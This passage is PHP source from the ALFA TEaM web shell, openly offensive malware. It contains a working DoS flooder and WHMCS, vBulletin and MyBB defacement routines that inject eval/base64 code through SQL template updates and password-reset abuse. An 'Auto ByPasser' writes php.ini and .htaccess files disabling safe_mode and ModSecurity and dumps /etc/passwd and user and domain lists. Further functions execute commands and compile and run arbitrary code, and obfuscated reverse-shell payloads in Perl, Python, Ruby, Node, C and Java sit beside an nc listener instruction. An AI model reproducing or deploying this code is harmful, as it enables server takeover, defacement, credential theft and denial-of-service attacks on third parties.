';\nalfafooter();\n}\nfunction alfahash(){\nif(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}\nif(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i '__ZW5jb2Rlcg($s)',\n'Base64_decode ( $string )' => '__ZGVjb2Rlcg($s)',\n'strrev ( $string )' => 'strrev($s)',\n'bin2hex ( $string )' => 'bin2hex($s)',\n'hex2bin ( $string )' => 'hex2bin($s)',\n'md5 ( $string )' => 'md5($s)',\n'sha1 ( $string )' => 'sha1($s)',\n'hash ( \"sha251\", $string ) --> sha251' => 'hash(\"sha256\",$s)',\n'hash ( \"sha384\", $string ) --> sha384' => 'hash(\"sha384\",$s)',\n'hash ( \"sha512\", $string ) --> sha512' => 'hash(\"sha512\",$s)',\n'crypt ( $string )' => 'crypt($s)',\n'crc32 ( $string )' => 'crc32($s)',\n'str_rot13 ( $string )' => 'str_rot13($s)',\n'urlencode ( $string )' => 'urlencode($s)',\n'urldecode ( $string )' => 'urldecode($s)',\n'full_urlencode ( $string )' => 'full_urlencode($s)',\n'htmlspecialchars ( $string )' => 'htmlspecialchars($s)',\n'base64_encode (gzdeflate( $string , 9)) --> Encode' => '__ZW5jb2Rlcg(gzdeflate($s, 9))',\n'gzinflate (base64_decode( $string )) --> Decode' => '@gzinflate(__ZGVjb2Rlcg($s))',\n'str_rot13 (base64_encode( $string )) --> Encode' => 'str_rot13(__ZW5jb2Rlcg($s))',\n'base64_decode (str_rot13( $string )) --> Decode' => '__ZGVjb2Rlcg(str_rot13($s))',\n'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode' => 'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))',\n'gzinflate (base64_decode(str_rot13( $string ))) --> Decode' => '@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))',\n);\nalfahead();\necho '
';\necho \"
Method:

\";\nif(!empty($_POST['alfa1'])){\n$string = addslashes($_POST['alfa2']);\n$string = str_replace('\\\"','\"',$string);\n$alg = $_POST['alfa1'];\n$code = str_replace('$s',\"'\".$string.\"'\",$alg);\nob_start();\neval('echo '.$code.';');\n$res = ob_get_contents();\nob_end_clean();\nif(in_array($alg, $stringTools))echo '';\n}\necho \"
\";\nalfaFooter();\n}\nfunction alfados(){\nalfahead();\necho '
';\necho '

| DOS |

Method : Host : Time : Port :

';\nif(!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3'])){\necho __pre();\n$packets=0;\nignore_user_abort(true);\n$exec_time=(int)$_POST['alfa2'];\n$time=time();\n$max_time=$exec_time+$time;\n$host=$_POST['alfa1'];\n$port=(int)$_POST['alfa3'];\n$method=$_POST['alfa4'];\n$out = str_repeat('X',65000);\nwhile(1){\n$packets++;\nif(time() > $max_time){\nbreak;\n}\n$fp = @fsockopen($method.'://'.$host, $port, $errno, $errstr, 5);\nif($fp){\nfwrite($fp, $out);\nfclose($fp);\n}\n}\necho \"
$packets (\" . @round(($packets*65)/1024, 2) . \" MB) packets averaging \". @round($packets/$exec_time, 2) . \" packets per second
\";\necho \"\";\n}\necho '
';\nalfafooter();\n}\nfunction __pre(){return('
');}\nfunction alfaIndexChanger(){\nalfahead();\n\necho '
| Index Changer |
| Whmcs | | vBulletin | | MyBB | 
';\nif(isset($_POST['alfa3'])&&($_POST['alfa3'] == 'whmcs')){\necho __pre();\n\necho \"
| Whmcs |
\n
\".getConfigHtml('whmcs').\"
\n\";\n$table = array('td1' =>\n array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),\n 'td2' =>\n array('color' => 'FFFFFF', 'tdName' => 'URL', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),\n 'td3' =>\n array('color' => 'FFFFFF', 'tdName' => 'File Name', 'inputName' => 'fname', 'inputValue' => '', 'inputSize' => '50'),\n 'td4' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),\n 'td5' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),\n 'td6' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')\n);\ncreate_table($table);\necho \"
| Your Index |

\n
\n\n
\";\nif(isset($_POST['alfa6'])){\n$s0levisible=\"Powered By Solevisible\";\n$dbu = $_POST['alfa6'];\n$path = $_POST['alfa5'];\n$fname = $_POST['alfa4'];\n$dbn = $_POST['alfa7'];\n$dbp = $_POST['alfa8'];\n$dbh = $_POST['alfa9'];\n$index = $_POST['alfa10'];\n$index = str_replace(\"\\'\",\"'\",$index);\n$deface = '$x = base64_decode(\"'.__ZW5jb2Rlcg($index).'\"); $solevisible = fopen(\"'.$fname.'\",\"w\"); fwrite($solevisible,$x);';\n$saveData = __ZW5jb2Rlcg($deface);\n$Def = '{php}eval(base64_decode(\"'.$saveData.'\"));{/php}';\nif(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){\n$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));\n$soleSave=@mysqli_query($conn,\"select message from tblemailtemplates where name='Password Reset Validation'\");\n$soleGet = mysqli_fetch_assoc($soleSave);\n$tempSave1 = $soleGet['message'];\n$tempSave = str_replace(\"'\",\"\\'\",$tempSave1);\n$inject = \"UPDATE tblemailtemplates SET message='$Def' WHERE name='Password Reset Validation'\";\n$result=@mysqli_query($conn,$inject) or die (mysqli_error($conn));\n$create = \"insert into tblclients (email) values('[email protected]')\";\n$result2 =@mysqli_query($conn,$create) or die (mysqli_error($conn));\nif(function_exists('curl_version')){\n$AlfaSole = new AlfaCURL(true);\n$saveurl = $AlfaSole->Send($path.\"/pwreset.php\");\n$getToken = preg_match(\"/name=\\\"token\\\" value=\\\"(.*?)\\\"/i\",$saveurl,$token);\n$AlfaSole->Send($path.\"/pwreset.php\",\"post\",\"token={$token[1]}[email protected]\");\n$backdata = \"UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'\";\n$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));\n__alert('File Created...');\necho \"

Click Here !


\";\n}else{\necho \"

Please go to Target \\\" \".$path.\"/pwreset.php \\\"
 and reset password with email => [email protected]
and go to \\\" \".$path.\"/\".$fname.\" \\\"


\";\n}}}}\nif(isset($_POST['alfa1']) && ($_POST['alfa1'] == 'vb')){\necho __pre();\n\necho \"
| vBulletin |
\n
\".getConfigHtml('vb').\"
>'); return false;\\\">\n\";\n$table = array('td1' =>\n array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),\n 'td2' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),\n 'td3' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),\n 'td4' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),\n 'td5' =>\n array('color' => 'FFFFFF', 'tdName' => 'Prefix', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50')\n);\ncreate_table($table);\necho \"
| Your Index |

\n
\n
\";\nif($_POST['alfa8']=='>>'){\n$s0levisible=\"Powered By Solevisible\";\n$dbu = $_POST['alfa2'];\n$dbn = $_POST['alfa3'];\n$dbp = $_POST['alfa4'];\n$dbh = $_POST['alfa5'];\n$index = $_POST['alfa6'];\n$prefix = $_POST['alfa7'];\n$index=str_replace(\"\\'\",\"'\",$index);\n$set_index = \"{\\${eval(base64_decode(\\'\";\n$set_index .= __ZW5jb2Rlcg(\"echo \\\"$index\\\";\");\n$set_index .= \"\\'))}}{\\${exit()}}\";\nif(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){\n$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));\n$loli1 = \"UPDATE \".$prefix.\"template SET template='\".$set_index.\"\".$s0levisible.\"' WHERE title='spacer_open'\";\n$loli2 = \"UPDATE \".$prefix.\"template SET template='\".$set_index.\"\".$s0levisible.\"' WHERE title='FORUMHOME'\";\n$loli3 = \"UPDATE \".$prefix.\"style SET css='\".$set_index.\"\".$s0levisible.\"', stylevars='', csscolors='', editorstyles=''\";\n@mysqli_query($conn,$loli1) or die (mysqli_error($conn));\n@mysqli_query($conn,$loli2) or die (mysqli_error($conn));\n@mysqli_query($conn,$loli3) or die (mysqli_error($conn));\n__alert('VB index changed...!');\n}\n}\n}\nif(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'mybb')) {\necho __pre();\n\necho \"
| Mybb |
\n
\".getConfigHtml('mybb').\"
\n\";\n$table = array('td1' =>\n array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'mybbdbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),\n 'td2' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'mybbdbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),\n 'td3' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'mybbdbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),\n 'td4' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'mybbdbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')\n);\ncreate_table($table);\necho \"
| Your Index |

\n
\";\nif(isset($_POST['alfa6'])){\n$mybb_dbh = $_POST['alfa6'];\n$mybb_dbu = $_POST['alfa7'];\n$mybb_dbn = $_POST['alfa8'];\n$mybb_dbp = $_POST['alfa9'];\n$mybb_index = $_POST['alfa10'];\nif(!empty($mybb_dbh)&&!empty($mybb_dbu)&&!empty($mybb_dbn)&&!empty($mybb_index)){\n$conn=@mysqli_connect($mybb_dbh,$mybb_dbu,$mybb_dbp,$mybb_dbn) or die(mysqli_error($conn));\n$prefix=\"mybb_\";\n$loli7 = \"UPDATE \".$prefix.\"templates SET template='\".$mybb_index.\"' WHERE title='index'\";\n$result =@mysqli_query($conn,$loli7) or die (mysqli_error($conn));\n__alert('MyBB index changed...!');\n}\n}\n}\necho \"
\";\nalfafooter();\n}\nfunction alfaproc()\n{\nalfahead();\necho \"

\";\nif(empty($_POST['ajax'])&&!empty($_POST['alfa1']))\n$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false;\nif($GLOBALS['sys']==\"win\"){\n$process=array(\n\"Task List\" =>\"tasklist /V\",\n\"System Info\" =>\"systeminfo\",\n\"Active Connections\" => \"netstat -an\",\n\"Running Services\" => \"net start\",\n\"User Accounts\" => \"net user\",\n\"Show Computers\" => \"net view\",\n\"ARP Table\" => \"arp -a\",\n\"IP Configuration\" => \"ipconfig /all\"\n);}else{\n$process=array(\n\"Process status\" => \"ps aux\",\n\"Syslog\" =>\"cat /etc/syslog.conf\",\n\"Resolv\" => \"cat /etc/resolv.conf\",\n\"Hosts\" =>\"cat /etc/hosts\",\n\"Cpuinfo\"=>\"cat /proc/cpuinfo\",\n\"Version\"=>\"cat /proc/version\",\n\"Sbin\"=>\"ls -al /usr/sbin\",\n\"Interrupts\"=>\"cat /proc/interrupts\",\n\"lsattr\"=>\"lsattr -va\",\n\"Uptime\"=>\"uptime\",\n\"Fstab\" =>\"cat /etc/fstab\"\n);}\nforeach($process as $n => $link){\necho ' | '.$n.' | ';\n}\necho \"

\";\nif(!empty($_POST['alfa1'])){\necho \"
\";\nif($GLOBALS[\"glob_chdir_false\"]&&!empty($_POST[\"c\"])){$cmd = \"cd '\".addslashes($_POST[\"c\"]).\"';\";}\necho alfaEx($cmd.$_POST['alfa1'], true);\necho '
';\n}\necho \"
\";\nalfafooter();\n}\nfunction alfasafe(){\nalfahead();\necho \"

| Auto ByPasser |
\";\necho '
| PHP.INI | | .htaccess(apache) | | .htaccess(LiteSpeed) || Read-Passwd | | Read-Users | | Get-User | | Get-Domains | 
';\nif(!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains'){\nif(!_alfa_file_exists(\"/etc/virtual/domainowners\")){\necho __pre();\n$solevisible9 = _alfa_file('/etc/named.conf');\nif(is_array($solevisible9)){\nforeach($solevisible9 as $solevisible13){\nif(@eregi('zone',$solevisible13)){\npreg_match_all('#zone \"(.*)\"#',$solevisible13,$solevisible14);\nif(strlen(trim($solevisible14[1][0])) > 2){\necho $solevisible14[1][0].'
';\n}}}\n}\n}else{\necho __pre();\n$users = _alfa_file(\"/etc/virtual/domainowners\");\nif(is_array($users)){\nforeach($users as $boz){\n$dom = explode(\":\",$boz);\necho $dom[0].\"\\n\";}}}}\nif(!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases'){\necho '\n
>\\'); return false;\" method=\"post\" />
Url:  
';\nif(isset($_POST['alfa9']) && $_POST['alfa9'] == '>>'){\nif(!_alfa_file_exists(\"/etc/virtual/domainowners\")){\n$site = trim($_POST['alfa7']);\n$rep = str_replace(array(\"https://\",\"http://\",\"www.\"),\"\",$site);\n$user = \"\";\nif(function_exists(\"posix_getpwuid\") && function_exists(\"fileowner\")){\n\tif($user = @posix_getpwuid(@fileowner(\"/etc/valiases/{$rep}\"))){\n\t\t$user = $user['name'];\n\t}\n}else{\n\tif(_alfa_can_runCommand(true,true)){\n\t\t$user = alfaEx(\"stat -c '%U' /etc/valiases/\".$rep);\n\t}\n}\nif(!empty($user)&&$user!='root'){\necho __pre().\"
User: {$user}
site: {$rep}
\";\n}else {echo __pre().'
No such file or directory Or Disable Functions is not NONE...
';}\n}else{\n$site = trim($_POST['alfa7']);\n$rep = str_replace(array(\"https://\",\"http://\",\"www.\"),\"\",$site);\n$users = _alfa_file(\"/etc/virtual/domainowners\");\nforeach($users as $boz){\n$ex = explode(\":\",$boz);\nif($ex[0] == $rep){\necho __pre().\"
\n\n
User: \".trim($ex[1]).\"
site: {$rep}
\";break;}}}}}\nif(!empty($_POST['alfa5']) && isset($_POST['alfa5'])){\nif(!_alfa_file_exists(\"/etc/virtual/domainowners\")){\necho __pre();\n$i = 0;\nwhile ($i < 60000) {\n$line = @posix_getpwuid($i);\nif (!empty($line)) {\nwhile (list ($key, $vl) = each($line)){\necho $vl.\"\\n\";\nbreak;}}$i++;}\n}else{echo __pre();\n$users = _alfa_file(\"/etc/virtual/domainowners\");\nforeach($users as $boz){\n$user = explode(\":\",$boz);\necho trim($user[1]).'
';}}}\nif(!empty($_POST['alfa4']) && isset($_POST['alfa4'])){\necho __pre();\nif(_alfa_can_runCommand(true,true)){echo __read_file(\"/etc/passwd\");}elseif(function_exists(\"posix_getpwuid\")){\nfor($uid=0;$uid<60000;$uid++){\n$ara = @posix_getpwuid($uid);\nif(!empty($ara)){\nwhile(list ($key, $val) = each($ara)){\necho \"$val:\";\n}echo \"\\n\";}}\n}else{__alert('failed...');}}\nif(!empty($_POST['alfa2']) && isset($_POST['alfa2'])){\n@__write_file($GLOBALS['cwd'].\".htaccess\",\"#Generated By Sole Sad and Invisible\\n\\nSec------Engine Off\\nSec------ScanPOST Off\\n\");\necho '
htaccess for Apache created...!
';\n}\nif(!empty($_POST['alfa1'])&& isset($_POST['alfa1'])){\n@__write_file($GLOBALS['cwd'].\"php.ini\",\"safe_mode=OFF\\ndisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)\");\necho '
 php.ini created...!
';\n}\nif(!empty($_POST['alfa3']) && isset($_POST['alfa3'])){\n@__write_file($GLOBALS['cwd'].\".htaccess\",\"#Generated By Sole Sad and Invisible\\n\\nForceType application/x-httpd-php4\\n\\n\\nSecFilterEngine Off\\nSecFilterScanPOST Off\\n\");\necho '
htaccess for Litespeed created...!
';\n}\necho \"
\";\nalfafooter();\n}\nfunction __get_resource($content){\nreturn @gzinflate(__ZGVjb2Rlcg($content));\n}\nfunction __write_file($file, $content){\nif($fh = @fopen($file, \"wb\")){\nif(fwrite($fh, $content)!==false) return true;\n}\nreturn false;\n}\nfunction bcinit($evalType, $evalCode, $evalOptions, $evalArguments){\n$res = \"[ Success...! ]\";\n$err = \"[ Failed...! ]\";\nif($evalOptions!=\"\") $evalOptions = $evalOptions.\" \";\nif($evalArguments!=\"\") $evalArguments = \" \".$evalArguments;\nif($evalType==\"c\"){\n$tmpdir = ALFA_TEMPDIR;\nchdir($tmpdir);\nif(is_writable($tmpdir)){\n$uniq = substr(md5(time()),0,8);\n$filename = $evalType.$uniq.\".c\";\n$path = $filename;\nif(__write_file($path, $evalCode)){\n$ext = ($GLOBALS['sys']=='win')? \".exe\":\".out\";\n$pathres = $filename.$ext;\n$evalOptions = \"-o \".$pathres.\" \".$evalOptions;\n$cmd = \"gcc \".$evalOptions.$path;\nalfaEx($cmd);\nif(is_file($pathres)){\nif(chmod($pathres, 0755)){\n$cmd = $pathres.$evalArguments;\nalfaEx($cmd);\n}else{$res = $err;}\nunlink($pathres);\n}else{$res = $err;}\nunlink($path);\n}else{$res = $err;}\n}\nreturn $res;\n}elseif($evalType==\"java\"){\n$tmpdir = ALFA_TEMPDIR;\nchdir($tmpdir);\nif(is_writable($tmpdir)){\nif(preg_match(\"/class\\ ([^{]+){/i\",$evalCode, $r)){\n$classname = trim($r[1]);\n$filename = $classname;\n}else{\n$uniq = substr(md5(time()),0,8);\n$filename = $evalType.$uniq;\n$evalCode = \"class \".$filename.\" { \".$evalCode . \" } \";\n}\n$path = $filename.\".java\";\nif(__write_file($path, $evalCode)){\n$cmd = \"javac \".$evalOptions.$path;\nalfaEx($cmd);\n$pathres = $filename.\".class\";\nif(is_file($pathres)){\nif(chmod($pathres, 0755)){\n$cmd = \"java \".$filename.$evalArguments;\nalfaEx($cmd);\n}else{$res = $err;}\nunlink($pathres);\n}else{$res = $err;}\nunlink($path);\n}else{$res = $err;}\n}\nreturn $res;\n}\nreturn false;\n}\nfunction alfaconnect(){\nalfahead();\n$php=\"7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=\";\n$python=\"pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==\";\n$perl=\"lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==\";\n$ruby=\"tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=\";\n$node=\"nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==\";\n$c=\"tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==\";\n$java=\"lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D\";\necho \"

| Back Connect |


\";\necho \"
\n
Mehtod:
  
Use:
  
IP:
 
 
Port: 
  
Run ` nc -l -v -p port ` on your computer and press ` >> ` button

